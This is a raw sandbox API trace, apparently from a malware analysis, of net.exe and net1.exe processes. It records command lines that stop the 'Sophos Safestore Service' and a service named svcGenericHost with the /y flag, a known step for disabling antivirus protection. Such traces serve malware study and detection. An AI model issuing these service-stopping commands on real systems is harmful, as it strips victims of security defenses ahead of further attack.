[0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x18 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x2a [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1㽰s1") returned 0x58 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0x184 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0xc7 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0x47 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0xc2 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0x319 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0x483 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0xa86 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0x54 [0208.151] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0208.151] LocalFree (hMem=0x739860) returned 0x0 [0208.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1顠s1") returned 0xad [0208.151] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0208.152] LocalFree (hMem=0x739860) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1顠s1") returned 0x2e [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1㽰s1") returned 0x7d [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0208.152] LocalFree (hMem=0x739860) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1顠s1") returned 0x26 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x1b [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1㽰s1") returned 0xbe [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0208.152] LocalFree (hMem=0x739860) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1顠s1") returned 0x33 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1㽰s1") returned 0xc1 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0208.152] LocalFree (hMem=0x739860) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1顠s1") returned 0x16 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x33 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0208.152] LocalFree (hMem=0x733f70) returned 0x0 [0208.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="顠s⡋瓢1㽰s1") returned 0x234 [0208.152] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0208.152] LocalFree (hMem=0x739860) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1顠s1") returned 0x13 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x16 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㶈s⡋瓢1㽰s1") returned 0x11 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733d88) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㶈s1") returned 0x14 [0208.153] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.153] LocalFree (hMem=0x733f70) returned 0x0 [0208.153] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x12 [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.154] LocalFree (hMem=0x733f70) returned 0x0 [0208.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0xf [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.154] LocalFree (hMem=0x733f70) returned 0x0 [0208.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x17 [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.154] LocalFree (hMem=0x733f70) returned 0x0 [0208.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x18 [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0208.154] LocalFree (hMem=0x733f70) returned 0x0 [0208.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x2a [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0208.154] LocalFree (hMem=0x733f70) returned 0x0 [0208.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.154] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0208.154] GetFileType (hFile=0x26c) returned 0x3 [0208.154] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x31f7f8 | out: lpMode=0x31f7f8) returned 0 [0208.155] GetConsoleOutputCP () returned 0x1b5 [0208.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0208.155] malloc (_Size=0x16) returned 0x192738 [0208.155] GetConsoleOutputCP () returned 0x1b5 [0208.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x192738, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0208.155] WriteFile (in: hFile=0x26c, lpBuffer=0x192738, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x31f7fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f7fc, lpOverlapped=0x0) returned 0 [0208.155] free (_Block=0x192738) [0208.155] LocalFree (hMem=0x733f70) returned 0x0 [0208.156] NetApiBufferFree (Buffer=0x731ca8) returned 0x0 [0208.156] NetApiBufferFree (Buffer=0x731cc0) returned 0x0 [0208.156] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y" [0208.156] exit (_Code=1) Process: id = "258" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4bf49000" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop svcGenericHost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 431 os_tid = 0x960 Process: id = "259" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6aabb000" os_pid = "0x920" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "258" os_parent_pid = "0x924" cmd_line = "C:\\Windows\\system32\\net1 stop svcGenericHost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 432 os_tid = 0x978 [0208.308] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfd04 | out: lpSystemTimeAsFileTime=0x1dfd04*(dwLowDateTime=0x4558e120, dwHighDateTime=0x1d57a87)) [0208.308] GetCurrentProcessId () returned 0x920 [0208.308] GetCurrentThreadId () returned 0x978 [0208.308] GetTickCount () returned 0x116dac6 [0208.308] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfcfc | out: lpPerformanceCount=0x1dfcfc*=32859232191) returned 1 [0208.308] GetModuleHandleA (lpModuleName=0x0) returned 0x470000 [0208.308] __set_app_type (_Type=0x1) [0208.308] __p__fmode () returned 0x74eb31f4 [0208.308] __p__commode () returned 0x74eb31fc [0208.308] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x47ffe6) returned 0x0 [0208.308] __getmainargs (in: _Argc=0x489064, _Argv=0x48906c, _Env=0x489068, _DoWildCard=0, _StartInfo=0x489024 | out: _Argc=0x489064, _Argv=0x48906c, _Env=0x489068) returned 0 [0208.308] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.308] GetConsoleOutputCP () returned 0x1b5 [0208.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x489080 | out: lpCPInfo=0x489080) returned 1 [0208.309] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.312] sprintf_s (in: _DstBuf=0x1dfcbc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.312] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0208.314] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0208.314] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop svcGenericHost /y" [0208.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dfa88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.314] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x70) returned 0x5b3c18 [0208.314] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc8c | out: Buffer=0x1dfc8c*=0x5b1c78) returned 0x0 [0208.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc8c | out: Buffer=0x1dfc8c*=0x5b1c90) returned 0x0 [0208.314] _fileno (_File=0x74eb2900) returned -2 [0208.315] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0208.315] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.315] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.315] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.315] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.315] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.315] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.315] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.315] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.315] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.315] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.315] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.315] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.315] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.315] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.315] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.315] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0208.315] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.315] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.315] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.315] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.315] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.315] _wcsicmp (_String1="accounts", _String2="svcGenericHost") returned -18 [0208.315] _wcsicmp (_String1="computer", _String2="svcGenericHost") returned -16 [0208.315] _wcsicmp (_String1="config", _String2="svcGenericHost") returned -16 [0208.315] _wcsicmp (_String1="continue", _String2="svcGenericHost") returned -16 [0208.315] _wcsicmp (_String1="cont", _String2="svcGenericHost") returned -16 [0208.315] _wcsicmp (_String1="file", _String2="svcGenericHost") returned -13 [0208.315] _wcsicmp (_String1="files", _String2="svcGenericHost") returned -13 [0208.315] _wcsicmp (_String1="group", _String2="svcGenericHost") returned -12 [0208.315] _wcsicmp (_String1="groups", _String2="svcGenericHost") returned -12 [0208.315] _wcsicmp (_String1="help", _String2="svcGenericHost") returned -11 [0208.315] _wcsicmp (_String1="helpmsg", _String2="svcGenericHost") returned -11 [0208.315] _wcsicmp (_String1="localgroup", _String2="svcGenericHost") returned -7 [0208.316] _wcsicmp (_String1="pause", _String2="svcGenericHost") returned -3 [0208.316] _wcsicmp (_String1="session", _String2="svcGenericHost") returned -17 [0208.316] _wcsicmp (_String1="sessions", _String2="svcGenericHost") returned -17 [0208.316] _wcsicmp (_String1="sess", _String2="svcGenericHost") returned -17 [0208.316] _wcsicmp (_String1="share", _String2="svcGenericHost") returned -14 [0208.316] _wcsicmp (_String1="start", _String2="svcGenericHost") returned -2 [0208.316] _wcsicmp (_String1="stats", _String2="svcGenericHost") returned -2 [0208.316] _wcsicmp (_String1="statistics", _String2="svcGenericHost") returned -2 [0208.316] _wcsicmp (_String1="stop", _String2="svcGenericHost") returned -2 [0208.316] _wcsicmp (_String1="time", _String2="svcGenericHost") returned 1 [0208.316] _wcsicmp (_String1="user", _String2="svcGenericHost") returned 2 [0208.316] _wcsicmp (_String1="users", _String2="svcGenericHost") returned 2 [0208.316] _wcsicmp (_String1="msg", _String2="svcGenericHost") returned -6 [0208.316] _wcsicmp (_String1="messenger", _String2="svcGenericHost") returned -6 [0208.316] _wcsicmp (_String1="receiver", _String2="svcGenericHost") returned -1 [0208.316] _wcsicmp (_String1="rcv", _String2="svcGenericHost") returned -1 [0208.316] _wcsicmp (_String1="netpopup", _String2="svcGenericHost") returned -5 [0208.316] _wcsicmp (_String1="redirector", _String2="svcGenericHost") returned -1 [0208.316] _wcsicmp (_String1="redir", _String2="svcGenericHost") returned -1 [0208.316] _wcsicmp (_String1="rdr", _String2="svcGenericHost") returned -1 [0208.316] _wcsicmp (_String1="workstation", _String2="svcGenericHost") returned 4 [0208.316] _wcsicmp (_String1="work", _String2="svcGenericHost") returned 4 [0208.316] _wcsicmp (_String1="wksta", _String2="svcGenericHost") returned 4 [0208.316] _wcsicmp (_String1="prdr", _String2="svcGenericHost") returned -3 [0208.316] _wcsicmp (_String1="devrdr", _String2="svcGenericHost") returned -15 [0208.316] _wcsicmp (_String1="lanmanworkstation", _String2="svcGenericHost") returned -7 [0208.316] _wcsicmp (_String1="server", _String2="svcGenericHost") returned -17 [0208.316] _wcsicmp (_String1="svr", _String2="svcGenericHost") returned 15 [0208.316] _wcsicmp (_String1="srv", _String2="svcGenericHost") returned -4 [0208.316] _wcsicmp (_String1="lanmanserver", _String2="svcGenericHost") returned -7 [0208.316] _wcsicmp (_String1="alerter", _String2="svcGenericHost") returned -18 [0208.316] _wcsicmp (_String1="netlogon", _String2="svcGenericHost") returned -5 [0208.316] _wcsupr (in: _String="svcGenericHost" | out: _String="SVCGENERICHOST") returned="SVCGENERICHOST" [0208.317] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5b54d8 [0208.319] GetServiceKeyNameW (in: hSCManager=0x5b54d8, lpDisplayName="SVCGENERICHOST", lpServiceName=0x48aaf0, lpcchBuffer=0x1dfc28 | out: lpServiceName="", lpcchBuffer=0x1dfc28) returned 0 [0208.319] _wcsicmp (_String1="msg", _String2="SVCGENERICHOST") returned -6 [0208.319] _wcsicmp (_String1="messenger", _String2="SVCGENERICHOST") returned -6 [0208.320] _wcsicmp (_String1="receiver", _String2="SVCGENERICHOST") returned -1 [0208.320] _wcsicmp (_String1="rcv", _String2="SVCGENERICHOST") returned -1 [0208.320] _wcsicmp (_String1="redirector", _String2="SVCGENERICHOST") returned -1 [0208.320] _wcsicmp (_String1="redir", _String2="SVCGENERICHOST") returned -1 [0208.320] _wcsicmp (_String1="rdr", _String2="SVCGENERICHOST") returned -1 [0208.320] _wcsicmp (_String1="workstation", _String2="SVCGENERICHOST") returned 4 [0208.320] _wcsicmp (_String1="work", _String2="SVCGENERICHOST") returned 4 [0208.320] _wcsicmp (_String1="wksta", _String2="SVCGENERICHOST") returned 4 [0208.320] _wcsicmp (_String1="prdr", _String2="SVCGENERICHOST") returned -3 [0208.320] _wcsicmp (_String1="devrdr", _String2="SVCGENERICHOST") returned -15 [0208.320] _wcsicmp (_String1="lanmanworkstation", _String2="SVCGENERICHOST") returned -7 [0208.320] _wcsicmp (_String1="server", _String2="SVCGENERICHOST") returned -17 [0208.320] _wcsicmp (_String1="svr", _String2="SVCGENERICHOST") returned 15 [0208.320] _wcsicmp (_String1="srv", _String2="SVCGENERICHOST") returned -4 [0208.320] 